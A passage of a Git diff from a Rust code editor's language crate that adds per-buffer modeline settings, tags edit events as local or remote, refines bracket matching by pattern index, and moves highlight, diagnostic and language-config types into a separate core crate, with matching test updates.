} => Some(size), DiskState::Deleted => None, DiskState::Historic { .. } => None, } @@ -737,7 +695,7 @@ impl HighlightedTextBuilder { if let Some(highlight_style) = chunk .syntax_highlight_id - .and_then(|id| id.style(syntax_theme)) + .and_then(|id| syntax_theme.get(id).cloned()) { let highlight_style = override_style.map_or(highlight_style, |override_style| { highlight_style.highlight(override_style) @@ -1153,6 +1111,7 @@ impl Buffer { deferred_ops: OperationQueue::new(), has_conflict: false, change_bits: Default::default(), + modeline: None, _subscriptions: Vec::new(), encoding: encoding_rs::UTF_8, has_bom: false, @@ -1165,6 +1124,7 @@ impl Buffer { text: Rope, language: Option>, language_registry: Option>, + modeline: Option>, cx: &mut App, ) -> impl Future + use<> { let entity_id = cx.reserve_entity::().entity_id(); @@ -1189,6 +1149,7 @@ impl Buffer { language, non_text_state_update_count: 0, capability: Capability::ReadOnly, + modeline, } } } @@ -1215,6 +1176,7 @@ impl Buffer { language: None, non_text_state_update_count: 0, capability: Capability::ReadOnly, + modeline: None, } } @@ -1245,6 +1207,7 @@ impl Buffer { language, non_text_state_update_count: 0, capability: Capability::ReadOnly, + modeline: None, } } @@ -1275,6 +1238,7 @@ impl Buffer { language: self.language.clone(), non_text_state_update_count: self.non_text_state_update_count, capability: self.capability, + modeline: self.modeline.clone(), } } @@ -1527,6 +1491,21 @@ impl Buffer { ); } + /// Assign the buffer [`ModelineSettings`]. + pub fn set_modeline(&mut self, modeline: Option) -> bool { + if modeline.as_ref() != self.modeline.as_deref() { + self.modeline = modeline.map(Arc::new); + true + } else { + false + } + } + + /// Returns the [`ModelineSettings`]. + pub fn modeline(&self) -> Option<&Arc> { + self.modeline.as_ref() + } + /// Assign the buffer a new [`Capability`]. 
pub fn set_capability(&mut self, capability: Capability, cx: &mut Context) { if self.capability != capability { @@ -1776,7 +1755,9 @@ impl Buffer { self.syntax_map.lock().contains_unknown_injections() } - #[cfg(any(test, feature = "test-support"))] + /// Sets the sync parse timeout for this buffer. + /// + /// Setting this to `None` disables sync parsing entirely. pub fn set_sync_parse_timeout(&mut self, timeout: Option) { self.sync_parse_timeout = timeout; } @@ -2375,7 +2356,7 @@ impl Buffer { }; match file.disk_state() { DiskState::New => false, - DiskState::Present { mtime } => match self.saved_mtime { + DiskState::Present { mtime, .. } => match self.saved_mtime { Some(saved_mtime) => { mtime.bad_is_greater_than(saved_mtime) && self.has_unsaved_edits() } @@ -2455,7 +2436,7 @@ impl Buffer { false }; if let Some((transaction_id, start_version)) = self.text.end_transaction_at(now) { - self.did_edit(&start_version, was_dirty, cx); + self.did_edit(&start_version, was_dirty, true, cx); Some(transaction_id) } else { None @@ -2736,17 +2717,22 @@ impl Buffer { .filter(|((_, (range, _)), _)| { let language = before_edit.language_at(range.start); let language_id = language.map(|l| l.id()); - if let Some((cached_language_id, auto_indent)) = previous_setting + if let Some((cached_language_id, apply_syntax_indent)) = previous_setting && cached_language_id == language_id { - auto_indent + apply_syntax_indent } else { // The auto-indent setting is not present in editorconfigs, hence // we can avoid passing the file here. 
- let auto_indent = - language_settings(language.map(|l| l.name()), None, cx).auto_indent; - previous_setting = Some((language_id, auto_indent)); - auto_indent + let auto_indent_mode = LanguageSettings::resolve( + None, + language.map(|l| l.name()).as_ref(), + cx, + ) + .auto_indent; + let apply_syntax_indent = auto_indent_mode == AutoIndentMode::SyntaxAware; + previous_setting = Some((language_id, apply_syntax_indent)); + apply_syntax_indent } }) .map(|((ix, (range, _)), new_text)| { @@ -2841,7 +2827,13 @@ impl Buffer { Some(edit_id) } - fn did_edit(&mut self, old_version: &clock::Global, was_dirty: bool, cx: &mut Context) { + fn did_edit( + &mut self, + old_version: &clock::Global, + was_dirty: bool, + is_local: bool, + cx: &mut Context, + ) { self.was_changed(); if self.edits_since::(old_version).next().is_none() { @@ -2849,10 +2841,20 @@ impl Buffer { } self.reparse(cx, true); - cx.emit(BufferEvent::Edited); - if was_dirty != self.is_dirty() { + cx.emit(BufferEvent::Edited { is_local }); + let is_dirty = self.is_dirty(); + if was_dirty != is_dirty { cx.emit(BufferEvent::DirtyChanged); } + if was_dirty && !is_dirty { + if let Some(file) = self.file.as_ref() { + if matches!(file.disk_state(), DiskState::Present { .. }) + && file.disk_state().mtime() != self.saved_mtime + { + cx.emit(BufferEvent::ReloadNeeded); + } + } + } cx.notify(); } @@ -2961,7 +2963,7 @@ impl Buffer { self.text.apply_ops(buffer_ops); self.deferred_ops.insert(deferred_ops); self.flush_deferred_ops(cx); - self.did_edit(&old_version, was_dirty, cx); + self.did_edit(&old_version, was_dirty, false, cx); // Notify independently of whether the buffer was edited as the operations could include a // selection update. 
cx.notify(); @@ -3116,7 +3118,7 @@ impl Buffer { if let Some((transaction_id, operation)) = self.text.undo() { self.send_operation(Operation::Buffer(operation), true, cx); - self.did_edit(&old_version, was_dirty, cx); + self.did_edit(&old_version, was_dirty, true, cx); self.restore_encoding_for_transaction(transaction_id, was_dirty); Some(transaction_id) } else { @@ -3134,7 +3136,7 @@ impl Buffer { let old_version = self.version.clone(); if let Some(operation) = self.text.undo_transaction(transaction_id) { self.send_operation(Operation::Buffer(operation), true, cx); - self.did_edit(&old_version, was_dirty, cx); + self.did_edit(&old_version, was_dirty, true, cx); true } else { false @@ -3156,7 +3158,7 @@ impl Buffer { self.send_operation(Operation::Buffer(operation), true, cx); } if undone { - self.did_edit(&old_version, was_dirty, cx) + self.did_edit(&old_version, was_dirty, true, cx) } undone } @@ -3166,7 +3168,7 @@ impl Buffer { let operation = self.text.undo_operations(counts); let old_version = self.version.clone(); self.send_operation(Operation::Buffer(operation), true, cx); - self.did_edit(&old_version, was_dirty, cx); + self.did_edit(&old_version, was_dirty, true, cx); } /// Manually redoes a specific transaction in the buffer's redo history. 
@@ -3176,7 +3178,7 @@ impl Buffer { if let Some((transaction_id, operation)) = self.text.redo() { self.send_operation(Operation::Buffer(operation), true, cx); - self.did_edit(&old_version, was_dirty, cx); + self.did_edit(&old_version, was_dirty, true, cx); self.restore_encoding_for_transaction(transaction_id, was_dirty); Some(transaction_id) } else { @@ -3217,7 +3219,7 @@ impl Buffer { self.send_operation(Operation::Buffer(operation), true, cx); } if redone { - self.did_edit(&old_version, was_dirty, cx) + self.did_edit(&old_version, was_dirty, true, cx) } redone } @@ -3272,6 +3274,10 @@ impl Buffer { pub fn preserve_preview(&self) -> bool { !self.has_edits_since(&self.preview_version) } + + pub fn set_group_interval(&mut self, group_interval: Duration) { + self.text.set_group_interval(group_interval); + } } #[doc(hidden)] @@ -3287,10 +3293,6 @@ impl Buffer { self.edit(edits, autoindent_mode, cx); } - pub fn set_group_interval(&mut self, group_interval: Duration) { - self.text.set_group_interval(group_interval); - } - pub fn randomly_edit(&mut self, rng: &mut T, old_range_count: usize, cx: &mut Context) where T: rand::Rng, @@ -3327,7 +3329,7 @@ impl Buffer { if !ops.is_empty() { for op in ops { self.send_operation(Operation::Buffer(op), true, cx); - self.did_edit(&old_version, was_dirty, cx); + self.did_edit(&old_version, was_dirty, true, cx); } } } @@ -3368,11 +3370,7 @@ impl BufferSnapshot { /// Returns [`IndentSize`] for a given position that respects user settings /// and language preferences. 
pub fn language_indent_size_at(&self, position: T, cx: &App) -> IndentSize { - let settings = language_settings( - self.language_at(position).map(|l| l.name()), - self.file(), - cx, - ); + let settings = self.settings_at(position, cx); if settings.hard_tabs { IndentSize::tab() } else { @@ -3706,6 +3704,14 @@ impl BufferSnapshot { None } + pub fn captures( + &self, + range: Range, + query: fn(&Grammar) -> Option<&tree_sitter::Query>, + ) -> SyntaxMapCaptures<'_> { + self.syntax.captures(range, &self.text, query) + } + #[ztracing::instrument(skip_all)] fn get_highlights(&self, range: Range) -> (SyntaxMapCaptures<'_>, Vec) { let captures = self.syntax.captures(range, &self.text, |grammar| { @@ -3830,6 +3836,11 @@ impl BufferSnapshot { }) } + /// Returns the [`ModelineSettings`]. + pub fn modeline(&self) -> Option<&Arc> { + self.modeline.as_ref() + } + /// Returns the main [`Language`]. pub fn language(&self) -> Option<&Arc> { self.language.as_ref() @@ -3848,11 +3859,7 @@ impl BufferSnapshot { position: D, cx: &'a App, ) -> Cow<'a, LanguageSettings> { - language_settings( - self.language_at(position).map(|l| l.name()), - self.file.as_ref(), - cx, - ) + LanguageSettings::for_buffer_snapshot(self, Some(position.to_offset(self)), cx) } pub fn char_classifier_at(&self, point: T) -> CharClassifier { @@ -4490,7 +4497,8 @@ impl BufferSnapshot { let style = chunk .syntax_highlight_id .zip(theme) - .and_then(|(highlight, theme)| highlight.style(theme)); + .and_then(|(highlight, theme)| theme.get(highlight).cloned()); + if let Some(style) = style { let start = text.len(); let end = start + chunk.text.len(); @@ -4573,7 +4581,7 @@ impl BufferSnapshot { continue; } - let mut all_brackets: Vec<(BracketMatch, bool)> = Vec::new(); + let mut all_brackets: Vec<(BracketMatch, usize, bool)> = Vec::new(); let mut opens = Vec::new(); let mut color_pairs = Vec::new(); @@ -4599,8 +4607,9 @@ impl BufferSnapshot { let mut open = None; let mut close = None; let syntax_layer_depth = mat.depth; + 
let pattern_index = mat.pattern_index; let config = configs[mat.grammar_index]; - let pattern = &config.patterns[mat.pattern_index]; + let pattern = &config.patterns[pattern_index]; for capture in mat.captures { if capture.index == config.open_capture_ix { open = Some(capture.node.byte_range()); @@ -4621,7 +4630,7 @@ impl BufferSnapshot { } open_to_close_ranges - .entry((open_range.start, open_range.end)) + .entry((open_range.start, open_range.end, pattern_index)) .or_insert_with(BTreeMap::new) .insert( (close_range.start, close_range.end), @@ -4642,6 +4651,7 @@ impl BufferSnapshot { newline_only: pattern.newline_only, color_index: None, }, + pattern_index, pattern.rainbow_exclude, )); } @@ -4655,22 +4665,43 @@ impl BufferSnapshot { // For each close, we know the expected open_len from tree-sitter matches. // Map each close to its expected open length (for inferring opens) - let close_to_open_len: HashMap<(usize, usize), usize> = all_brackets + let close_to_open_len: HashMap<(usize, usize, usize), usize> = all_brackets .iter() - .map(|(m, _)| ((m.close_range.start, m.close_range.end), m.open_range.len())) + .map(|(bracket_match, pattern_index, _)| { + ( + ( + bracket_match.close_range.start, + bracket_match.close_range.end, + *pattern_index, + ), + bracket_match.open_range.len(), + ) + }) .collect(); // Collect unique opens and closes within this chunk - let mut unique_opens: HashSet<(usize, usize)> = all_brackets + let mut unique_opens: HashSet<(usize, usize, usize)> = all_brackets .iter() - .map(|(m, _)| (m.open_range.start, m.open_range.end)) - .filter(|(start, _)| chunk_range.contains(start)) + .map(|(bracket_match, pattern_index, _)| { + ( + bracket_match.open_range.start, + bracket_match.open_range.end, + *pattern_index, + ) + }) + .filter(|(start, _, _)| chunk_range.contains(start)) .collect(); - let mut unique_closes: Vec<(usize, usize)> = all_brackets + let mut unique_closes: Vec<(usize, usize, usize)> = all_brackets .iter() - .map(|(m, _)| 
(m.close_range.start, m.close_range.end)) - .filter(|(start, _)| chunk_range.contains(start)) + .map(|(bracket_match, pattern_index, _)| { + ( + bracket_match.close_range.start, + bracket_match.close_range.end, + *pattern_index, + ) + }) + .filter(|(start, _, _)| chunk_range.contains(start)) .collect(); unique_closes.sort(); unique_closes.dedup(); @@ -4679,8 +4710,9 @@ impl BufferSnapshot { let mut unique_opens_vec: Vec<_> = unique_opens.iter().copied().collect(); unique_opens_vec.sort(); - let mut valid_pairs: HashSet<((usize, usize), (usize, usize))> = HashSet::default(); - let mut open_stack: Vec<(usize, usize)> = Vec::new(); + let mut valid_pairs: HashSet<((usize, usize, usize), (usize, usize, usize))> = + HashSet::default(); + let mut open_stacks: HashMap> = HashMap::default(); let mut open_idx = 0; for close in &unique_closes { @@ -4688,36 +4720,53 @@ impl BufferSnapshot { while open_idx < unique_opens_vec.len() && unique_opens_vec[open_idx].0 < close.0 { - open_stack.push(unique_opens_vec[open_idx]); + let (start, end, pattern_index) = unique_opens_vec[open_idx]; + open_stacks + .entry(pattern_index) + .or_default() + .push((start, end)); open_idx += 1; } // Try to match with most recent open - if let Some(open) = open_stack.pop() { - valid_pairs.insert((open, *close)); + let (close_start, close_end, pattern_index) = *close; + if let Some(open) = open_stacks + .get_mut(&pattern_index) + .and_then(|open_stack| open_stack.pop()) + { + valid_pairs.insert(((open.0, open.1, pattern_index), *close)); } else if let Some(&open_len) = close_to_open_len.get(close) { // No open on stack - infer one based on expected open_len - if close.0 >= open_len { - let inferred = (close.0 - open_len, close.0); + if close_start >= open_len { + let inferred = (close_start - open_len, close_start, pattern_index); unique_opens.insert(inferred); valid_pairs.insert((inferred, *close)); all_brackets.push(( BracketMatch { open_range: inferred.0..inferred.1, - close_range: 
close.0..close.1, + close_range: close_start..close_end, newline_only: false, syntax_layer_depth: 0, color_index: None, }, + pattern_index, false, )); } } } - all_brackets.retain(|(m, _)| { - let open = (m.open_range.start, m.open_range.end); - let close = (m.close_range.start, m.close_range.end); + all_brackets.retain(|(bracket_match, pattern_index, _)| { + let open = ( + bracket_match.open_range.start, + bracket_match.open_range.end, + *pattern_index, + ); + let close = ( + bracket_match.close_range.start, + bracket_match.close_range.end, + *pattern_index, + ); valid_pairs.contains(&(open, close)) }); } @@ -4725,7 +4774,7 @@ impl BufferSnapshot { let mut all_brackets = all_brackets .into_iter() .enumerate() - .map(|(index, (bracket_match, rainbow_exclude))| { + .map(|(index, (bracket_match, _, rainbow_exclude))| { // Certain languages have "brackets" that are not brackets, e.g. tags. and such // bracket will match the entire tag with all text inside. // For now, avoid highlighting any pair that has more than single char in each bracket. 
@@ -5433,6 +5482,7 @@ impl Clone for BufferSnapshot { tree_sitter_data: self.tree_sitter_data.clone(), non_text_state_update_count: self.non_text_state_update_count, capability: self.capability, + modeline: self.modeline.clone(), } } } @@ -5499,11 +5549,11 @@ impl<'a> BufferChunks<'a> { && range.start >= capture.node.start_byte() { let next_capture_end = capture.node.end_byte(); - if range.start < next_capture_end { - highlights.stack.push(( - next_capture_end, - highlights.highlight_maps[capture.grammar_index].get(capture.index), - )); + if range.start < next_capture_end + && let Some(capture_id) = + highlights.highlight_maps[capture.grammar_index].get(capture.index) + { + highlights.stack.push((next_capture_end, capture_id)); } highlights.next_capture.take(); } @@ -5638,9 +5688,11 @@ impl<'a> Iterator for BufferChunks<'a> { } else { let highlight_id = highlights.highlight_maps[capture.grammar_index].get(capture.index); - highlights - .stack - .push((capture.node.end_byte(), highlight_id)); + if let Some(highlight_id) = highlight_id { + highlights + .stack + .push((capture.node.end_byte(), highlight_id)); + } highlights.next_capture = highlights.captures.next(); } } @@ -5733,27 +5785,6 @@ impl operation_queue::Operation for Operation { } } -impl Default for Diagnostic { - fn default() -> Self { - Self { - source: Default::default(), - source_kind: DiagnosticSourceKind::Other, - code: None, - code_description: None, - severity: DiagnosticSeverity::ERROR, - message: Default::default(), - markdown: None, - group_id: 0, - is_primary: false, - is_disk_based: false, - is_unnecessary: false, - underline: true, - data: None, - registration_id: None, - } - } -} - impl IndentSize { /// Returns an [`IndentSize`] representing the given spaces. 
pub fn spaces(len: u32) -> Self { diff --git a/crates/language/src/buffer_tests.rs b/crates/language/src/buffer_tests.rs index 49d871cc860bb6df892b80ac433fb70264788664..9308ee6f0a0ee207b30be9e6fafa73ba9452d94c 100644 --- a/crates/language/src/buffer_tests.rs +++ b/crates/language/src/buffer_tests.rs @@ -246,6 +246,7 @@ async fn test_first_line_pattern(cx: &mut TestAppContext) { matcher: LanguageMatcher { path_suffixes: vec!["js".into()], first_line_pattern: Some(Regex::new(r"\bnode\b").unwrap()), + ..LanguageMatcher::default() }, ..Default::default() }); @@ -458,15 +459,18 @@ fn test_edit_events(cx: &mut gpui::App) { assert_eq!( mem::take(&mut *buffer_1_events.lock()), vec![ - BufferEvent::Edited, + BufferEvent::Edited { is_local: true }, BufferEvent::DirtyChanged, - BufferEvent::Edited, - BufferEvent::Edited, + BufferEvent::Edited { is_local: true }, + BufferEvent::Edited { is_local: true }, ] ); assert_eq!( mem::take(&mut *buffer_2_events.lock()), - vec![BufferEvent::Edited, BufferEvent::DirtyChanged] + vec![ + BufferEvent::Edited { is_local: false }, + BufferEvent::DirtyChanged + ] ); buffer1.update(cx, |buffer, cx| { @@ -481,11 +485,17 @@ fn test_edit_events(cx: &mut gpui::App) { }); assert_eq!( mem::take(&mut *buffer_1_events.lock()), - vec![BufferEvent::Edited, BufferEvent::DirtyChanged,] + vec![ + BufferEvent::Edited { is_local: true }, + BufferEvent::DirtyChanged, + ] ); assert_eq!( mem::take(&mut *buffer_2_events.lock()), - vec![BufferEvent::Edited, BufferEvent::DirtyChanged] + vec![ + BufferEvent::Edited { is_local: false }, + BufferEvent::DirtyChanged + ] ); } @@ -3237,7 +3247,7 @@ fn test_undo_after_merge_into_base(cx: &mut TestAppContext) { async fn test_preview_edits(cx: &mut TestAppContext) { cx.update(|cx| { init_settings(cx, |_| {}); - theme::init(theme::LoadThemes::JustBase, cx); + theme_settings::init(theme::LoadThemes::JustBase, cx); }); let insertion_style = HighlightStyle { diff --git a/crates/language/src/diagnostic.rs 
b/crates/language/src/diagnostic.rs new file mode 100644 index 0000000000000000000000000000000000000000..951feec0da18582b56b361797efc0b346e7b2a04 --- /dev/null +++ b/crates/language/src/diagnostic.rs @@ -0,0 +1 @@ +pub use language_core::diagnostic::{Diagnostic, DiagnosticSourceKind}; diff --git a/crates/language/src/diagnostic_set.rs b/crates/language/src/diagnostic_set.rs index fa3263df48ff773b32332980e7341fa8a453ba4f..04564ecd6575f9470315e0571a60126c69d81d2b 100644 --- a/crates/language/src/diagnostic_set.rs +++ b/crates/language/src/diagnostic_set.rs @@ -326,23 +326,17 @@ impl DiagnosticEntry { } } -impl Default for Summary { - fn default() -> Self { - Self { - start: Anchor::MIN, - end: Anchor::MAX, - min_start: Anchor::MAX, - max_end: Anchor::MIN, - count: 0, - } - } -} - impl sum_tree::Summary for Summary { type Context<'a> = &'a text::BufferSnapshot; - fn zero(_cx: Self::Context<'_>) -> Self { - Default::default() + fn zero(buffer: &text::BufferSnapshot) -> Self { + Self { + start: Anchor::min_for_buffer(buffer.remote_id()), + end: Anchor::max_for_buffer(buffer.remote_id()), + min_start: Anchor::max_for_buffer(buffer.remote_id()), + max_end: Anchor::min_for_buffer(buffer.remote_id()), + count: 0, + } } fn add_summary(&mut self, other: &Self, buffer: Self::Context<'_>) { diff --git a/crates/language/src/highlight_map.rs b/crates/language/src/highlight_map.rs deleted file mode 100644 index ed9eb5d11d7bc4b156dc9bd660fb10a485129c3d..0000000000000000000000000000000000000000 --- a/crates/language/src/highlight_map.rs +++ /dev/null @@ -1,114 +0,0 @@ -use gpui::HighlightStyle; -use std::sync::Arc; -use theme::SyntaxTheme; - -#[derive(Clone, Debug)] -pub struct HighlightMap(Arc<[HighlightId]>); - -#[derive(Clone, Copy, Debug, PartialEq, Eq)] -pub struct HighlightId(pub u32); - -const DEFAULT_SYNTAX_HIGHLIGHT_ID: HighlightId = HighlightId(u32::MAX); - -impl HighlightMap { - pub(crate) fn new(capture_names: &[&str], theme: &SyntaxTheme) -> Self { - // For each capture 
name in the highlight query, find the longest - // key in the theme's syntax styles that matches all of the - // dot-separated components of the capture name. - HighlightMap( - capture_names - .iter() - .map(|capture_name| { - theme - .highlights - .iter() - .enumerate() - .filter_map(|(i, (key, _))| { - let mut len = 0; - let capture_parts = capture_name.split('.'); - for key_part in key.split('.') { - if capture_parts.clone().any(|part| part == key_part) { - len += 1; - } else { - return None; - } - } - Some((i, len)) - }) - .max_by_key(|(_, len)| *len) - .map_or(DEFAULT_SYNTAX_HIGHLIGHT_ID, |(i, _)| HighlightId(i as u32)) - }) - .collect(), - ) - } - - pub fn get(&self, capture_id: u32) -> HighlightId { - self.0 - .get(capture_id as usize) - .copied() - .unwrap_or(DEFAULT_SYNTAX_HIGHLIGHT_ID) - } -} - -impl HighlightId { - pub const TABSTOP_INSERT_ID: HighlightId = HighlightId(u32::MAX - 1); - pub const TABSTOP_REPLACE_ID: HighlightId = HighlightId(u32::MAX - 2); - - pub(crate) fn is_default(&self) -> bool { - *self == DEFAULT_SYNTAX_HIGHLIGHT_ID - } - - pub fn style(&self, theme: &SyntaxTheme) -> Option { - theme.highlights.get(self.0 as usize).map(|entry| entry.1) - } - - pub fn name<'a>(&self, theme: &'a SyntaxTheme) -> Option<&'a str> { - theme.highlights.get(self.0 as usize).map(|e| e.0.as_str()) - } -} - -impl Default for HighlightMap { - fn default() -> Self { - Self(Arc::new([])) - } -} - -impl Default for HighlightId { - fn default() -> Self { - DEFAULT_SYNTAX_HIGHLIGHT_ID - } -} - -#[cfg(test)] -mod tests { - use super::*; - use gpui::rgba; - - #[test] - fn test_highlight_map() { - let theme = SyntaxTheme { - highlights: [ - ("function", rgba(0x100000ff)), - ("function.method", rgba(0x200000ff)), - ("function.async", rgba(0x300000ff)), - ("variable.builtin.self.rust", rgba(0x400000ff)), - ("variable.builtin", rgba(0x500000ff)), - ("variable", rgba(0x600000ff)), - ] - .iter() - .map(|(name, color)| (name.to_string(), (*color).into())) - .collect(), - }; 
- - let capture_names = &[ - "function.special", - "function.async.rust", - "variable.builtin.self", - ]; - - let map = HighlightMap::new(capture_names, &theme); - assert_eq!(map.get(0).name(&theme), Some("function")); - assert_eq!(map.get(1).name(&theme), Some("function.async")); - assert_eq!(map.get(2).name(&theme), Some("variable.builtin")); - } -} diff --git a/crates/language/src/language.rs b/crates/language/src/language.rs index fd14f42a93179ae0423f5acfa6ede3cceec94935..43bbe7a08c73e476a41aec8af015464aa3af853d 100644 --- a/crates/language/src/language.rs +++ b/crates/language/src/language.rs @@ -7,11 +7,13 @@ //! //! Notably we do *not* assign a single language to a single file; in real world a single file can consist of multiple programming languages - HTML is a good example of that - and `language` crate tends to reflect that status quo in its API. mod buffer; +mod diagnostic; mod diagnostic_set; -mod highlight_map; mod language_registry; + pub mod language_settings; mod manifest; +pub mod modeline; mod outline; pub mod proto; mod syntax_map; @@ -22,17 +24,29 @@ mod toolchain; #[cfg(test)] pub mod buffer_tests; -use crate::language_settings::SoftWrap; -pub use crate::language_settings::{EditPredictionsMode, IndentGuideSettings}; +pub use crate::language_settings::{AutoIndentMode, EditPredictionsMode, IndentGuideSettings}; use anyhow::{Context as _, Result}; use async_trait::async_trait; -use collections::{HashMap, HashSet, IndexSet}; +use collections::{HashMap, HashSet}; use futures::Future; use futures::future::LocalBoxFuture; use futures::lock::OwnedMutexGuard; -use gpui::{App, AsyncApp, Entity, SharedString}; -pub use highlight_map::HighlightMap; +use gpui::{App, AsyncApp, Entity}; use http_client::HttpClient; + +pub use language_core::highlight_map::{HighlightId, HighlightMap}; + +pub use language_core::{ + BlockCommentConfig, BracketPair, BracketPairConfig, BracketPairContent, BracketsConfig, + BracketsPatternConfig, CodeLabel, CodeLabelBuilder, 
DebugVariablesConfig, DebuggerTextObject, + DecreaseIndentConfig, Grammar, GrammarId, HighlightsConfig, IndentConfig, InjectionConfig, + InjectionPatternConfig, JsxTagAutoCloseConfig, LanguageConfig, LanguageConfigOverride, + LanguageId, LanguageMatcher, OrderedListConfig, OutlineConfig, Override, OverrideConfig, + OverrideEntry, PromptResponseContext, RedactionConfig, RunnableCapture, RunnableConfig, + SoftWrap, Symbol, TaskListConfig, TextObject, TextObjectConfig, ToLspPosition, + WrapCharactersConfig, auto_indent_using_last_non_empty_line_default, deserialize_regex, + deserialize_regex_vec, regex_json_schema, regex_vec_json_schema, serialize_regex, +}; pub use language_registry::{ LanguageName, LanguageServerStatusUpdate, LoadedLanguage, ServerHealth, }; @@ -40,15 +54,13 @@ use lsp::{ CodeActionKind, InitializeParams, LanguageServerBinary, LanguageServerBinaryOptions, Uri, }; pub use manifest::{ManifestDelegate, ManifestName, ManifestProvider, ManifestQuery}; +pub use modeline::{ModelineSettings, parse_modeline}; use parking_lot::Mutex; use regex::Regex; -use schemars::{JsonSchema, SchemaGenerator, json_schema}; use semver::Version; -use serde::{Deserialize, Deserializer, Serialize, Serializer, de}; use serde_json::Value; use settings::WorktreeId; use smol::future::FutureExt as _; -use std::num::NonZeroU32; use std::{ ffi::OsStr, fmt::Debug, @@ -57,10 +69,7 @@ use std::{ ops::{DerefMut, Range}, path::{Path, PathBuf}, str, - sync::{ - Arc, LazyLock, - atomic::{AtomicUsize, Ordering::SeqCst}, - }, + sync::{Arc, LazyLock}, }; use syntax_map::{QueryCursorHandle, SyntaxSnapshot}; use task::RunnableTag; @@ -75,12 +84,12 @@ pub use toolchain::{ LanguageToolchainStore, LocalLanguageToolchainStore, Toolchain, ToolchainList, ToolchainLister, ToolchainMetadata, ToolchainScope, }; -use tree_sitter::{self, Query, QueryCursor, WasmStore, wasmtime}; +use tree_sitter::{self, QueryCursor, WasmStore, wasmtime}; use util::rel_path::RelPath; -use util::serde::default_true; pub use 
buffer::Operation; pub use buffer::*; +pub use diagnostic::{Diagnostic, DiagnosticSourceKind}; pub use diagnostic_set::{DiagnosticEntry, DiagnosticEntryRef, DiagnosticGroup}; pub use language_registry::{ AvailableLanguage, BinaryStatus, LanguageNotFound, LanguageQueries, LanguageRegistry, @@ -94,6 +103,16 @@ pub use syntax_map::{ pub use text::{AnchorRangeExt, LineEnding}; pub use tree_sitter::{Node, Parser, Tree, TreeCursor}; +pub(crate) fn to_settings_soft_wrap(value: language_core::SoftWrap) -> settings::SoftWrap { + match value { + language_core::SoftWrap::None => settings::SoftWrap::None, + language_core::SoftWrap::PreferLine => settings::SoftWrap::PreferLine, + language_core::SoftWrap::EditorWidth => settings::SoftWrap::EditorWidth, + language_core::SoftWrap::PreferredLineLength => settings::SoftWrap::PreferredLineLength, + language_core::SoftWrap::Bounded => settings::SoftWrap::Bounded, + } +} + static QUERY_CURSORS: Mutex> = Mutex::new(vec![]); static PARSERS: Mutex> = Mutex::new(vec![]); @@ -123,8 +142,6 @@ where func(cursor.deref_mut()) } -static NEXT_LANGUAGE_ID: AtomicUsize = AtomicUsize::new(0); -static NEXT_GRAMMAR_ID: AtomicUsize = AtomicUsize::new(0); static WASM_ENGINE: LazyLock = LazyLock::new(|| { wasmtime::Engine::new(&wasmtime::Config::new()).expect("Failed to create Wasmtime engine") }); @@ -138,6 +155,7 @@ pub static PLAIN_TEXT: LazyLock> = LazyLock::new(|| { matcher: LanguageMatcher { path_suffixes: vec!["txt".to_owned()], first_line_pattern: None, + modeline_aliases: vec!["text".to_owned(), "txt".to_owned()], }, brackets: BracketPairConfig { pairs: vec![ @@ -185,26 +203,12 @@ pub static PLAIN_TEXT: LazyLock> = LazyLock::new(|| { )) }); -/// Types that represent a position in a buffer, and can be converted into -/// an LSP position, to send to a language server. -pub trait ToLspPosition { - /// Converts the value into an LSP position. 
- fn to_lsp_position(self) -> lsp::Position; -} - #[derive(Debug, Clone, PartialEq, Eq, Hash)] pub struct Location { pub buffer: Entity, pub range: Range, } -#[derive(Debug, Clone)] -pub struct Symbol { - pub name: String, - pub kind: lsp::SymbolKind, - pub container_name: Option, -} - type ServerBinaryCache = futures::lock::Mutex>; type DownloadableLanguageServerBinary = LocalBoxFuture<'static, Result>; pub type LanguageServerBinaryLocations = LocalBoxFuture< @@ -289,14 +293,12 @@ impl CachedLspAdapter { &self, params: &mut lsp::PublishDiagnosticsParams, server_id: LanguageServerId, - existing_diagnostics: Option<&'_ Buffer>, ) { - self.adapter - .process_diagnostics(params, server_id, existing_diagnostics) + self.adapter.process_diagnostics(params, server_id) } - pub fn retain_old_diagnostic(&self, previous_diagnostic: &Diagnostic, cx: &App) -> bool { - self.adapter.retain_old_diagnostic(previous_diagnostic, cx) + pub fn retain_old_diagnostic(&self, previous_diagnostic: &Diagnostic) -> bool { + self.adapter.retain_old_diagnostic(previous_diagnostic) } pub fn underline_diagnostic(&self, diagnostic: &lsp::Diagnostic) -> bool { @@ -394,31 +396,14 @@ pub trait LspAdapterDelegate: Send + Sync { async fn try_exec(&self, binary: LanguageServerBinary) -> Result<()>; } -/// Context provided to LSP adapters when a user responds to a ShowMessageRequest prompt. -/// This allows adapters to intercept preference selections (like "Always" or "Never") -/// and potentially persist them to Zed's settings. 
-#[derive(Debug, Clone)] -pub struct PromptResponseContext { - /// The original message shown to the user - pub message: String, - /// The action (button) the user selected - pub selected_action: lsp::MessageActionItem, -} - #[async_trait(?Send)] pub trait LspAdapter: 'static + Send + Sync + DynLspInstaller { fn name(&self) -> LanguageServerName; - fn process_diagnostics( - &self, - _: &mut lsp::PublishDiagnosticsParams, - _: LanguageServerId, - _: Option<&'_ Buffer>, - ) { - } + fn process_diagnostics(&self, _: &mut lsp::PublishDiagnosticsParams, _: LanguageServerId) {} /// When processing new `lsp::PublishDiagnosticsParams` diagnostics, whether to retain previous one(s) or not. - fn retain_old_diagnostic(&self, _previous_diagnostic: &Diagnostic, _cx: &App) -> bool { + fn retain_old_diagnostic(&self, _previous_diagnostic: &Diagnostic) -> bool { false } @@ -491,6 +476,7 @@ pub trait LspAdapter: 'static + Send + Sync + DynLspInstaller { async fn initialization_options( self: Arc, _: &Arc, + _cx: &mut AsyncApp, ) -> Result> { Ok(None) } @@ -808,281 +794,6 @@ where } } -#[derive(Clone, Debug, Default, PartialEq, Eq)] -pub struct CodeLabel { - /// The text to display. - pub text: String, - /// Syntax highlighting runs. - pub runs: Vec<(Range, HighlightId)>, - /// The portion of the text that should be used in fuzzy filtering. - pub filter_range: Range, -} - -#[derive(Clone, Debug, Default, PartialEq, Eq)] -pub struct CodeLabelBuilder { - /// The text to display. - text: String, - /// Syntax highlighting runs. - runs: Vec<(Range, HighlightId)>, - /// The portion of the text that should be used in fuzzy filtering. - filter_range: Range, -} - -#[derive(Clone, Deserialize, JsonSchema, Debug)] -pub struct LanguageConfig { - /// Human-readable name of the language. - pub name: LanguageName, - /// The name of this language for a Markdown code fence block - pub code_fence_block_name: Option>, - // The name of the grammar in a WASM bundle (experimental). 
